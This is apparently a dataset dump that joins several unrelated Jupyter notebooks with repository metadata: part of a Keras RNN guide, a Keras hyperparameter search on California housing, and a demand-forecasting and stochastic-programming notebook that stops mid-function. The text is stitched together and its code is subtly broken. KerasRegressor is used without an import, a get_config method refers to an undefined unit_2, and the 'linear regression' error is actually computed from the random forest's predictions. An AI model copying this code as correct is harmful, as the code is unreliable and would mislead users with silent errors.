keras.layers.Dense(output_size),\n ]\n )\n return model\n\n", "_____no_output_____" ] ], [ [ "Let's load the MNIST dataset:", "_____no_output_____" ] ], [ [ "mnist = keras.datasets.mnist\n\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\nx_train, x_test = x_train / 255.0, x_test / 255.0\nsample, sample_label = x_train[0], y_train[0]\n", "_____no_output_____" ] ], [ [ "Let's create a model instance and train it.\n\nWe choose `sparse_categorical_crossentropy` as the loss function for the model. The\noutput of the model has shape of `[batch_size, 10]`. The target for the model is a\ninteger vector, each of the integer is in the range of 0 to 9.", "_____no_output_____" ] ], [ [ "model = build_model(allow_cudnn_kernel=True)\n\nmodel.compile(\n loss=keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n optimizer=\"sgd\",\n metrics=[\"accuracy\"],\n)\n\n\nmodel.fit(\n x_train, y_train, validation_data=(x_test, y_test), batch_size=batch_size, epochs=1\n)\n", "_____no_output_____" ] ], [ [ "Now, let's compare to a model that does not use the CuDNN kernel:", "_____no_output_____" ] ], [ [ "noncudnn_model = build_model(allow_cudnn_kernel=False)\nnoncudnn_model.set_weights(model.get_weights())\nnoncudnn_model.compile(\n loss=keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n optimizer=\"sgd\",\n metrics=[\"accuracy\"],\n)\nnoncudnn_model.fit(\n x_train, y_train, validation_data=(x_test, y_test), batch_size=batch_size, epochs=1\n)\n", "_____no_output_____" ] ], [ [ "When running on a machine with a NVIDIA GPU and CuDNN installed,\nthe model built with CuDNN is much faster to train compared to the\nmodel that use the regular TensorFlow kernel.\n\nThe same CuDNN-enabled model can also be use to run inference in a CPU-only\nenvironment. The `tf.device` annotation below is just forcing the device placement.\nThe model will run on CPU by default if no GPU is available.\n\nYou simply don't have to worry about the hardware you're running on anymore. 
Isn't that\npretty cool?", "_____no_output_____" ] ], [ [ "import matplotlib.pyplot as plt\n\nwith tf.device(\"CPU:0\"):\n cpu_model = build_model(allow_cudnn_kernel=True)\n cpu_model.set_weights(model.get_weights())\n result = tf.argmax(cpu_model.predict_on_batch(tf.expand_dims(sample, 0)), axis=1)\n print(\n \"Predicted result is: %s, target result is: %s\" % (result.numpy(), sample_label)\n )\n plt.imshow(sample, cmap=plt.get_cmap(\"gray\"))\n", "_____no_output_____" ] ], [ [ "## RNNs with list/dict inputs, or nested inputs\n\nNested structures allow implementers to include more information within a single\ntimestep. For example, a video frame could have audio and video input at the same\ntime. The data shape in this case could be:\n\n`[batch, timestep, {\"video\": [height, width, channel], \"audio\": [frequency]}]`\n\nIn another example, handwriting data could have both coordinates x and y for the\ncurrent position of the pen, as well as pressure information. So the data\nrepresentation could be:\n\n`[batch, timestep, {\"location\": [x, y], \"pressure\": [force]}]`\n\nThe following code provides an example of how to build a custom RNN cell that accepts\nsuch structured inputs.\n", "_____no_output_____" ], [ "### Define a custom cell that support nested input/output", "_____no_output_____" ], [ "See [Making new Layers & Models via subclassing](/guides/making_new_layers_and_models_via_subclassing/)\nfor details on writing your own layers.", "_____no_output_____" ] ], [ [ "\nclass NestedCell(keras.layers.Layer):\n def __init__(self, unit_1, unit_2, unit_3, **kwargs):\n self.unit_1 = unit_1\n self.unit_2 = unit_2\n self.unit_3 = unit_3\n self.state_size = [tf.TensorShape([unit_1]), tf.TensorShape([unit_2, unit_3])]\n self.output_size = [tf.TensorShape([unit_1]), tf.TensorShape([unit_2, unit_3])]\n super(NestedCell, self).__init__(**kwargs)\n\n def build(self, input_shapes):\n # expect input_shape to contain 2 items, [(batch, i1), (batch, i2, i3)]\n i1 = 
input_shapes[0][1]\n i2 = input_shapes[1][1]\n i3 = input_shapes[1][2]\n\n self.kernel_1 = self.add_weight(\n shape=(i1, self.unit_1), initializer=\"uniform\", name=\"kernel_1\"\n )\n self.kernel_2_3 = self.add_weight(\n shape=(i2, i3, self.unit_2, self.unit_3),\n initializer=\"uniform\",\n name=\"kernel_2_3\",\n )\n\n def call(self, inputs, states):\n # inputs should be in [(batch, input_1), (batch, input_2, input_3)]\n # state should be in shape [(batch, unit_1), (batch, unit_2, unit_3)]\n input_1, input_2 = tf.nest.flatten(inputs)\n s1, s2 = states\n\n output_1 = tf.matmul(input_1, self.kernel_1)\n output_2_3 = tf.einsum(\"bij,ijkl->bkl\", input_2, self.kernel_2_3)\n state_1 = s1 + output_1\n state_2_3 = s2 + output_2_3\n\n output = (output_1, output_2_3)\n new_states = (state_1, state_2_3)\n\n return output, new_states\n\n def get_config(self):\n return {\"unit_1\": self.unit_1, \"unit_2\": unit_2, \"unit_3\": self.unit_3}\n\n", "_____no_output_____" ] ], [ [ "### Build a RNN model with nested input/output\n\nLet's build a Keras model that uses a `keras.layers.RNN` layer and the custom cell\nwe just defined.", "_____no_output_____" ] ], [ [ "unit_1 = 10\nunit_2 = 20\nunit_3 = 30\n\ni1 = 32\ni2 = 64\ni3 = 32\nbatch_size = 64\nnum_batches = 10\ntimestep = 50\n\ncell = NestedCell(unit_1, unit_2, unit_3)\nrnn = keras.layers.RNN(cell)\n\ninput_1 = keras.Input((None, i1))\ninput_2 = keras.Input((None, i2, i3))\n\noutputs = rnn((input_1, input_2))\n\nmodel = keras.models.Model([input_1, input_2], outputs)\n\nmodel.compile(optimizer=\"adam\", loss=\"mse\", metrics=[\"accuracy\"])\n", "_____no_output_____" ] ], [ [ "### Train the model with randomly generated data\n\nSince there isn't a good candidate dataset for this model, we use random Numpy data for\ndemonstration.", "_____no_output_____" ] ], [ [ "input_1_data = np.random.random((batch_size * num_batches, timestep, i1))\ninput_2_data = np.random.random((batch_size * num_batches, timestep, i2, i3))\ntarget_1_data = 
np.random.random((batch_size * num_batches, unit_1))\ntarget_2_data = np.random.random((batch_size * num_batches, unit_2, unit_3))\ninput_data = [input_1_data, input_2_data]\ntarget_data = [target_1_data, target_2_data]\n\nmodel.fit(input_data, target_data, batch_size=batch_size)\n", "_____no_output_____" ] ], [ [ "With the Keras `keras.layers.RNN` layer, You are only expected to define the math\nlogic for individual step within the sequence, and the `keras.layers.RNN` layer\nwill handle the sequence iteration for you. It's an incredibly powerful way to quickly\nprototype new kinds of RNNs (e.g. a LSTM variant).\n\nFor more details, please visit the [API docs](https://keras.io/api/layers/recurrent_layers/RNN/).", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
e7303dce1a30c7b1749062ecc49b4dcb4ca57c04
73,540
ipynb
Jupyter Notebook
notebook/3_PowerSimulations_examples/11_PTDF.ipynb
raphaelsaavedra/SIIPExamples.jl
d7304c84fe5382db2ff4c20f058bc1e5d01cae8c
[ "BSD-3-Clause" ]
null
null
null
notebook/3_PowerSimulations_examples/11_PTDF.ipynb
raphaelsaavedra/SIIPExamples.jl
d7304c84fe5382db2ff4c20f058bc1e5d01cae8c
[ "BSD-3-Clause" ]
null
null
null
notebook/3_PowerSimulations_examples/11_PTDF.ipynb
raphaelsaavedra/SIIPExamples.jl
d7304c84fe5382db2ff4c20f058bc1e5d01cae8c
[ "BSD-3-Clause" ]
null
null
null
69.181562
8,441
0.605018
[ [ [ "empty" ] ] ]
[ "empty" ]
[ [ "empty" ] ]
e7306e675c60fda3030284857602991a6e7ea722
218,203
ipynb
Jupyter Notebook
JupyterNotebookCode/tf_keras_regression-hp-search-sklearn.ipynb
DragonYong/Tensorflow
1f2b9fd81916515eb27f76827d31a61c31e03edb
[ "MIT" ]
null
null
null
JupyterNotebookCode/tf_keras_regression-hp-search-sklearn.ipynb
DragonYong/Tensorflow
1f2b9fd81916515eb27f76827d31a61c31e03edb
[ "MIT" ]
2
2020-06-01T04:32:46.000Z
2020-06-02T01:10:32.000Z
JupyterNotebookCode/tf_keras_regression-hp-search-sklearn.ipynb
DragonYong/Tensorflow
1f2b9fd81916515eb27f76827d31a61c31e03edb
[ "MIT" ]
null
null
null
65.803076
21,088
0.476213
[ [ [ "import matplotlib as mpl\nimport matplotlib.pyplot as plt\n%matplotlib inline\nimport numpy as np\nimport sklearn\nimport pandas as pd\nimport os\nimport sys\nimport time\nimport tensorflow as tf\n\nfrom tensorflow import keras\n\nprint(tf.__version__)\nprint(sys.version_info)\nfor module in mpl, np, pd, sklearn, tf, keras:\n print(module.__name__, module.__version__)", "2.0.0-alpha0\nsys.version_info(major=3, minor=7, micro=3, releaselevel='final', serial=0)\nmatplotlib 3.0.3\nnumpy 1.16.2\npandas 0.24.2\nsklearn 0.20.3\ntensorflow 2.0.0-alpha0\ntensorflow.python.keras.api._v2.keras 2.2.4-tf\n" ], [ "from sklearn.datasets import fetch_california_housing\n\nhousing = fetch_california_housing()\nprint(housing.DESCR)\nprint(housing.data.shape)\nprint(housing.target.shape)", ".. _california_housing_dataset:\n\nCalifornia Housing dataset\n--------------------------\n\n**Data Set Characteristics:**\n\n :Number of Instances: 20640\n\n :Number of Attributes: 8 numeric, predictive attributes and the target\n\n :Attribute Information:\n - MedInc median income in block\n - HouseAge median house age in block\n - AveRooms average number of rooms\n - AveBedrms average number of bedrooms\n - Population block population\n - AveOccup average house occupancy\n - Latitude house block latitude\n - Longitude house block longitude\n\n :Missing Attribute Values: None\n\nThis dataset was obtained from the StatLib repository.\nhttp://lib.stat.cmu.edu/datasets/\n\nThe target variable is the median house value for California districts.\n\nThis dataset was derived from the 1990 U.S. census, using one row per census\nblock group. A block group is the smallest geographical unit for which the U.S.\nCensus Bureau publishes sample data (a block group typically has a population\nof 600 to 3,000 people).\n\nIt can be downloaded/loaded using the\n:func:`sklearn.datasets.fetch_california_housing` function.\n\n.. topic:: References\n\n - Pace, R. 
Kelley and Ronald Barry, Sparse Spatial Autoregressions,\n Statistics and Probability Letters, 33 (1997) 291-297\n\n(20640, 8)\n(20640,)\n" ], [ "from sklearn.model_selection import train_test_split\n\nx_train_all, x_test, y_train_all, y_test = train_test_split(\n housing.data, housing.target, random_state = 7)\nx_train, x_valid, y_train, y_valid = train_test_split(\n x_train_all, y_train_all, random_state = 11)\nprint(x_train.shape, y_train.shape)\nprint(x_valid.shape, y_valid.shape)\nprint(x_test.shape, y_test.shape)\n", "(11610, 8) (11610,)\n(3870, 8) (3870,)\n(5160, 8) (5160,)\n" ], [ "from sklearn.preprocessing import StandardScaler\n\nscaler = StandardScaler()\nx_train_scaled = scaler.fit_transform(x_train)\nx_valid_scaled = scaler.transform(x_valid)\nx_test_scaled = scaler.transform(x_test)", "_____no_output_____" ], [ "# RandomizedSearchCV\n# 1. 转化为sklearn的model\n# 2. 定义参数集合\n# 3. 搜索参数\n\ndef build_model(hidden_layers = 1,\n layer_size = 30,\n learning_rate = 3e-3):\n model = keras.models.Sequential()\n model.add(keras.layers.Dense(layer_size, activation='relu',\n input_shape=x_train.shape[1:]))\n for _ in range(hidden_layers - 1):\n model.add(keras.layers.Dense(layer_size,\n activation = 'relu'))\n model.add(keras.layers.Dense(1))\n optimizer = keras.optimizers.SGD(learning_rate)\n model.compile(loss = 'mse', optimizer = optimizer)\n return model\n\nsklearn_model = KerasRegressor(\n build_fn = build_model)\ncallbacks = [keras.callbacks.EarlyStopping(patience=5, min_delta=1e-2)]\nhistory = sklearn_model.fit(x_train_scaled, y_train,\n epochs = 10,\n validation_data = (x_valid_scaled, y_valid),\n callbacks = callbacks)", "Train on 11610 samples, validate on 3870 samples\nEpoch 1/10\n11610/11610 [==============================] - 1s 83us/sample - loss: 1.4329 - val_loss: 0.7654\nEpoch 2/10\n11610/11610 [==============================] - 1s 49us/sample - loss: 0.6528 - val_loss: 0.6674\nEpoch 3/10\n11610/11610 [==============================] - 1s 53us/sample - 
loss: 0.6594 - val_loss: 0.7570\nEpoch 4/10\n11610/11610 [==============================] - 1s 50us/sample - loss: 1.1426 - val_loss: 0.7110\nEpoch 5/10\n11610/11610 [==============================] - 1s 49us/sample - loss: 0.5703 - val_loss: 0.5765\nEpoch 6/10\n11610/11610 [==============================] - 1s 50us/sample - loss: 0.5263 - val_loss: 0.5544\nEpoch 7/10\n11610/11610 [==============================] - 1s 52us/sample - loss: 0.5052 - val_loss: 0.5334\nEpoch 8/10\n11610/11610 [==============================] - 1s 65us/sample - loss: 0.4915 - val_loss: 0.5176\nEpoch 9/10\n11610/11610 [==============================] - 1s 59us/sample - loss: 0.4800 - val_loss: 0.5063\nEpoch 10/10\n11610/11610 [==============================] - 1s 75us/sample - loss: 0.4717 - val_loss: 0.4973\n" ], [ "def plot_learning_curves(history):\n pd.DataFrame(history.history).plot(figsize=(8, 5))\n plt.grid(True)\n plt.gca().set_ylim(0, 1)\n plt.show()\nplot_learning_curves(history)", "_____no_output_____" ], [ "from scipy.stats import reciprocal\n# f(x) = 1/(x*log(b/a)) a <= x <= b\n\nparam_distribution = {\n \"hidden_layers\":[1, 2, 3, 4],\n \"layer_size\": np.arange(1, 100),\n \"learning_rate\": reciprocal(1e-4, 1e-2),\n}\n\nfrom sklearn.model_selection import RandomizedSearchCV\n\nrandom_search_cv = RandomizedSearchCV(sklearn_model,\n param_distribution,\n n_iter = 10,\n cv = 3,\n n_jobs = 1)\nrandom_search_cv.fit(x_train_scaled, y_train, epochs = 100,\n validation_data = (x_valid_scaled, y_valid),\n callbacks = callbacks)\n\n# cross_validation: 训练集分成n份,n-1训练,最后一份验证.", "Train on 7740 samples, validate on 3870 samples\nEpoch 1/100\n7740/7740 [==============================] - 1s 91us/sample - loss: 3.0039 - val_loss: 2.2811\nEpoch 2/100\n7740/7740 [==============================] - 0s 62us/sample - loss: 1.5413 - val_loss: 1.4473\nEpoch 3/100\n7740/7740 [==============================] - 1s 70us/sample - loss: 1.0946 - val_loss: 1.1101\nEpoch 4/100\n7740/7740 
[==============================] - 0s 55us/sample - loss: 0.9134 - val_loss: 0.9604\nEpoch 5/100\n7740/7740 [==============================] - 0s 56us/sample - loss: 0.8287 - val_loss: 0.8837\nEpoch 6/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.7808 - val_loss: 0.8373\nEpoch 7/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.7491 - val_loss: 0.8040\nEpoch 8/100\n7740/7740 [==============================] - 0s 53us/sample - loss: 0.7265 - val_loss: 0.7803\nEpoch 9/100\n7740/7740 [==============================] - 0s 57us/sample - loss: 0.7079 - val_loss: 0.7587\nEpoch 10/100\n7740/7740 [==============================] - 0s 54us/sample - loss: 0.6931 - val_loss: 0.7422\nEpoch 11/100\n7740/7740 [==============================] - 0s 49us/sample - loss: 0.6799 - val_loss: 0.7269\nEpoch 12/100\n7740/7740 [==============================] - 1s 67us/sample - loss: 0.6680 - val_loss: 0.7132\nEpoch 13/100\n7740/7740 [==============================] - 0s 54us/sample - loss: 0.6579 - val_loss: 0.7014\nEpoch 14/100\n7740/7740 [==============================] - 0s 56us/sample - loss: 0.6484 - val_loss: 0.6910\nEpoch 15/100\n7740/7740 [==============================] - 1s 66us/sample - loss: 0.6400 - val_loss: 0.6813\nEpoch 16/100\n7740/7740 [==============================] - 0s 56us/sample - loss: 0.6324 - val_loss: 0.6724\nEpoch 17/100\n7740/7740 [==============================] - 1s 70us/sample - loss: 0.6255 - val_loss: 0.6645\nEpoch 18/100\n7740/7740 [==============================] - 0s 52us/sample - loss: 0.6189 - val_loss: 0.6571\nEpoch 19/100\n7740/7740 [==============================] - 0s 58us/sample - loss: 0.6128 - val_loss: 0.6504\nEpoch 20/100\n7740/7740 [==============================] - 0s 49us/sample - loss: 0.6072 - val_loss: 0.6440\nEpoch 21/100\n7740/7740 [==============================] - 0s 57us/sample - loss: 0.6018 - val_loss: 0.6379\nEpoch 22/100\n7740/7740 [==============================] - 1s 
66us/sample - loss: 0.5969 - val_loss: 0.6322\nEpoch 23/100\n7740/7740 [==============================] - 1s 75us/sample - loss: 0.5922 - val_loss: 0.6269\nEpoch 24/100\n7740/7740 [==============================] - 0s 61us/sample - loss: 0.5878 - val_loss: 0.6220\nEpoch 25/100\n7740/7740 [==============================] - 1s 81us/sample - loss: 0.5837 - val_loss: 0.6171\nEpoch 26/100\n7740/7740 [==============================] - 1s 71us/sample - loss: 0.5798 - val_loss: 0.6129\nEpoch 27/100\n7740/7740 [==============================] - 0s 57us/sample - loss: 0.5761 - val_loss: 0.6090\nEpoch 28/100\n7740/7740 [==============================] - 1s 71us/sample - loss: 0.5723 - val_loss: 0.6048\nEpoch 29/100\n7740/7740 [==============================] - 0s 63us/sample - loss: 0.5689 - val_loss: 0.6012\nEpoch 30/100\n7740/7740 [==============================] - 0s 55us/sample - loss: 0.5655 - val_loss: 0.5974\nEpoch 31/100\n7740/7740 [==============================] - 0s 61us/sample - loss: 0.5624 - val_loss: 0.5941\nEpoch 32/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5594 - val_loss: 0.5911\nEpoch 33/100\n7740/7740 [==============================] - 0s 51us/sample - loss: 0.5565 - val_loss: 0.5878\nEpoch 34/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5537 - val_loss: 0.5845\nEpoch 35/100\n7740/7740 [==============================] - 0s 54us/sample - loss: 0.5512 - val_loss: 0.5815\nEpoch 36/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5486 - val_loss: 0.5791\nEpoch 37/100\n7740/7740 [==============================] - 0s 49us/sample - loss: 0.5462 - val_loss: 0.5764\nEpoch 38/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5438 - val_loss: 0.5738\nEpoch 39/100\n7740/7740 [==============================] - 0s 51us/sample - loss: 0.5414 - val_loss: 0.5714\nEpoch 40/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5393 - 
val_loss: 0.5688\nEpoch 41/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5369 - val_loss: 0.5660\nEpoch 42/100\n7740/7740 [==============================] - 0s 49us/sample - loss: 0.5349 - val_loss: 0.5640\nEpoch 43/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5329 - val_loss: 0.5617\nEpoch 44/100\n7740/7740 [==============================] - 0s 49us/sample - loss: 0.5309 - val_loss: 0.5595\nEpoch 45/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5288 - val_loss: 0.5569\nEpoch 46/100\n7740/7740 [==============================] - 0s 51us/sample - loss: 0.5270 - val_loss: 0.5548\nEpoch 47/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5251 - val_loss: 0.5528\nEpoch 48/100\n7740/7740 [==============================] - 0s 53us/sample - loss: 0.5232 - val_loss: 0.5505\nEpoch 49/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5214 - val_loss: 0.5484\nEpoch 50/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5197 - val_loss: 0.5464\nEpoch 51/100\n7740/7740 [==============================] - 0s 52us/sample - loss: 0.5179 - val_loss: 0.5446\nEpoch 52/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5163 - val_loss: 0.5427\nEpoch 53/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5147 - val_loss: 0.5411\n3870/3870 [==============================] - 0s 23us/sample - loss: 0.4830\n7740/7740 [==============================] - 0s 21us/sample - loss: 0.5133\nTrain on 7740 samples, validate on 3870 samples\nEpoch 1/100\n7740/7740 [==============================] - 1s 81us/sample - loss: 4.2068 - val_loss: 2.5104\nEpoch 2/100\n7740/7740 [==============================] - 0s 52us/sample - loss: 1.8832 - val_loss: 1.3657\nEpoch 3/100\n7740/7740 [==============================] - 0s 51us/sample - loss: 1.1896 - val_loss: 1.0111\nEpoch 4/100\n7740/7740 
[==============================] - 0s 51us/sample - loss: 0.9359 - val_loss: 0.8763\nEpoch 5/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.8307 - val_loss: 0.8143\nEpoch 6/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.7718 - val_loss: 0.7787\nEpoch 7/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.7348 - val_loss: 0.7573\nEpoch 8/100\n7740/7740 [==============================] - 0s 51us/sample - loss: 0.7100 - val_loss: 0.7430\nEpoch 9/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.6919 - val_loss: 0.7322\nEpoch 10/100\n7740/7740 [==============================] - 0s 51us/sample - loss: 0.6778 - val_loss: 0.7231\nEpoch 11/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.6661 - val_loss: 0.7149\nEpoch 12/100\n7740/7740 [==============================] - 0s 49us/sample - loss: 0.6561 - val_loss: 0.7075\nEpoch 13/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.6473 - val_loss: 0.7005\nEpoch 14/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.6393 - val_loss: 0.6936\nEpoch 15/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.6320 - val_loss: 0.6872\nEpoch 16/100\n7740/7740 [==============================] - 0s 51us/sample - loss: 0.6253 - val_loss: 0.6810\nEpoch 17/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.6189 - val_loss: 0.6747\nEpoch 18/100\n7740/7740 [==============================] - 0s 56us/sample - loss: 0.6129 - val_loss: 0.6690\nEpoch 19/100\n7740/7740 [==============================] - 0s 51us/sample - loss: 0.6072 - val_loss: 0.6634\nEpoch 20/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.6018 - val_loss: 0.6576\nEpoch 21/100\n7740/7740 [==============================] - 0s 53us/sample - loss: 0.5965 - val_loss: 0.6522\nEpoch 22/100\n" ], [ 
"print(random_search_cv.best_params_)\nprint(random_search_cv.best_score_)\nprint(random_search_cv.best_estimator_)", "{'hidden_layers': 4, 'layer_size': 44, 'learning_rate': 0.0009577195482517434}\n-0.38287415603026553\n<keras.wrappers.scikit_learn.KerasRegressor object at 0x138dbc080>\n" ], [ "model = random_search_cv.best_estimator_.model\nmodel.evaluate(x_test_scaled, y_test)", "5160/5160 [==============================] - 0s 30us/sample - loss: 0.3790\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
e730708e263901cc89e0d735b8e48787de6ff594
212,127
ipynb
Jupyter Notebook
misc - work/stochastic_ml_blend.ipynb
jkapila/paper-codebase
35198a924b66299cab0bf405d4f5ab54ca504be9
[ "BSD-3-Clause" ]
null
null
null
misc - work/stochastic_ml_blend.ipynb
jkapila/paper-codebase
35198a924b66299cab0bf405d4f5ab54ca504be9
[ "BSD-3-Clause" ]
null
null
null
misc - work/stochastic_ml_blend.ipynb
jkapila/paper-codebase
35198a924b66299cab0bf405d4f5ab54ca504be9
[ "BSD-3-Clause" ]
null
null
null
88.423093
43,816
0.776634
[ [ [ "### 1) GET LIBRARY", "_____no_output_____" ] ], [ [ "import numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.linear_model import LinearRegression\nimport pandas as pd", "_____no_output_____" ] ], [ [ "### 2) GENERATE DATA", "_____no_output_____" ] ], [ [ "np.random.seed(1234)", "_____no_output_____" ], [ "def generate_toy_data(n, lam, a, b):\n '''Generate random number from poisson distribution.\n Input:\n n = number of data points to generate\n lam = lambda of the poisson distribution\n a, b = any positive coefficient (since we want to simulate demand) \n \n Output:\n x = independent variable\n y = demand for toy data that results from a*x + b, with x ~ poisson(lam)\n '''\n x = np.random.poisson(lam, n)\n x = x.reshape((-1,1))\n \n y = a*x + b\n y = y.reshape((-1,1))\n y = y.astype(int)\n \n return x, y", "_____no_output_____" ], [ "# generate toy data\nx, y = generate_toy_data(1000, 100, 0.25, 2)\n\n# visualize toy data\nplt.figure()\nsns.distplot(y)\nplt.show()", "_____no_output_____" ], [ "# visualize toy data x\nplt.figure()\nsns.distplot(x)\nplt.show()", "_____no_output_____" ], [ "plt.figure()\nplt.scatter(x, y)\nplt.show()", "_____no_output_____" ] ], [ [ "### 3) IMPLEMENT SIMPLE PREDICTION", "_____no_output_____" ] ], [ [ "# split data to training and testing set\ntrain_x, test_x, train_y, test_y = train_test_split(x, y, test_size=0.2)", "_____no_output_____" ], [ "df_train = pd.DataFrame({'train_x': train_x.flatten(), 'train_y': train_y.flatten()})\ndf_test = pd.DataFrame({'test_x': test_x.flatten(), 'test_y': test_y.flatten()})", "_____no_output_____" ] ], [ [ "#### a) RANDOM FOREST", "_____no_output_____" ] ], [ [ "rf = RandomForestRegressor(n_estimators = 1000, random_state = 42)\nrf.fit(train_x, train_y)", 
"C:\\Users\\jkapila\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\ipykernel_launcher.py:2: DataConversionWarning: A column-vector y was passed when a 1d array was expected. Please change the shape of y to (n_samples,), for example using ravel().\n \n" ], [ "test_y_rfpred = (rf.predict(test_x)).astype(int)\nerr_rf = abs(test_y_rfpred - test_y)\nprint('Mean Absolute Error:', round(np.mean(err_rf), 2), 'degrees.')", "Mean Absolute Error: 3.05 degrees.\n" ] ], [ [ "#### b) LINEAR REGRESSION", "_____no_output_____" ] ], [ [ "lr = LinearRegression()\nlr.fit(train_x, train_y)", "_____no_output_____" ], [ "test_y_lrpred = (rf.predict(test_x)).astype(int)\nerr_lr = abs(test_y_lrpred - test_y)\nprint('Mean Absolute Error:', round(np.mean(err_lr), 2), 'degrees.')", "Mean Absolute Error: 3.05 degrees.\n" ], [ "# check coefficient\nprint(lr.coef_)\nprint(lr.intercept_)", "[[0.25079062]]\n[1.54812364]\n" ] ], [ [ "#### c) SUMMARIZE RESULT & CHECK GRAPH (RANDOM FOREST & LINREG)", "_____no_output_____" ] ], [ [ "df_summ = pd.DataFrame({'test_x': test_x.flatten(),\n 'test_y': test_y.flatten(), \n 'test_y_rfpred': test_y_rfpred.flatten(), \n 'test_y_lrpred': test_y_lrpred.flatten()})\ndf_summ['diff_rf_actual'] = df_summ['test_y_rfpred'] - df_summ['test_y']\ndf_summ['diff_lr_actual'] = df_summ['test_y_lrpred'] - df_summ['test_y']\n\n# toy data is simple, hence prediction is rather powerful as we only have few missed prediction\n# even so, in this kind of cases:\n# --> we will lose potential profit if prediction < demand\n# --> we will incur unnecessary cost if prediction > demand as we cannot sell the remaining goods at selling price \ndf_summ[(df_summ['diff_rf_actual'] != 0) | (df_summ['diff_lr_actual'] != 0)] ", "_____no_output_____" ], [ "plt.figure()\n\ncomponents = [test_y, test_y_rfpred, test_y_lrpred]\nlabels=['test_y', 'test_y_rfpred', 'test_y_lrpred']\n\nfig, axes = plt.subplots(1)\nfor component in components:\n 
sns.distplot(component)\n\naxes.legend(labels=labels) \nplt.show()", "_____no_output_____" ] ], [ [ "### 4) STOCHASTIC PROGRAMMING\n#### a) DISCRETIZING DEMAND: TO CAPTURE PROBABILITY OF EACH POSSIBLE SCENARIO", "_____no_output_____" ] ], [ [ "# capturing probability of each possible scenario can be done in many ways, \n# ranging from simple descriptive analytics to more complicated things like\n# moment matching, monte carlo simulation, etc.\n# we do the easiest here: do clustering to generate scenario (max 100 scenario for now)\n\nfrom sklearn.cluster import KMeans", "_____no_output_____" ], [ "def cluster_1d(df, max_cluster=100):\n '''Cluster data into n different cluster where n is the minimum between unique scenario and max_cluster.\n Input:\n df = dataframe column containing scenario to cluster\n max_cluster = number of maximum cluster we want to have (default=100)\n \n Output:\n cluster_centers_df = mapping between cluster labels and its centers\n cluster_labels_df = mapping between df and its cluster labels \n '''\n km = KMeans(n_clusters=min(len(df.unique()),max_cluster))\n km.fit(df.values.reshape(-1,1)) \n \n # get information about center\n centers = np.array(km.cluster_centers_.reshape(1,-1)[0].tolist())\n cluster_centers_df = pd.DataFrame({'cluster_centers':centers,'labels':range(len(centers))})\n# cluster_centers_df.columns = ['cluster_centers']\n# cluster_centers_df['labels'] = range(cluster_centers_df.count())\n \n # get information about labels and add information about center\n cluster_labels_df = pd.DataFrame(np.array(km.labels_))\n cluster_labels_df.columns = ['labels']\n cluster_labels_df = pd.concat([df.reset_index(drop=True), cluster_labels_df], axis=1)\n cluster_labels_df = pd.merge(cluster_labels_df, cluster_centers_df, on='labels', how='left')\n \n return cluster_centers_df, cluster_labels_df", "_____no_output_____" ], [ "def cluster_summ(df):\n '''Summarize probability for each scenario by referring to result from cluster_1d.\n Input:\n 
df = dataframe column containing scenario to cluster\n \n Output:\n cluster_proportion_df = dataframe containing complete information about probability for each scenario\n demand = possible scenario to happen\n weight = probability of the possible scenario to happen\n scenarios = indexing for demand\n '''\n cluster_centers_df, cluster_labels_df = cluster_1d(df)\n print(cluster_centers_df.head())\n print(cluster_labels_df.head())\n\n count_label = cluster_labels_df[['labels']].count().values[0]\n cluster_proportion_df = cluster_labels_df[['cluster_centers', 'labels']].groupby('cluster_centers').count().reset_index(drop=False)\n cluster_proportion_df['count_labels'] = count_label\n cluster_proportion_df['proportion_labels'] = cluster_proportion_df['labels'] / cluster_proportion_df['count_labels']\n cluster_proportion_df['index'] = range(1,cluster_proportion_df.shape[0] + 1)\n cluster_proportion_df['cluster_centers'] = np.round(cluster_proportion_df['cluster_centers'], decimals=(3))\n \n demand = 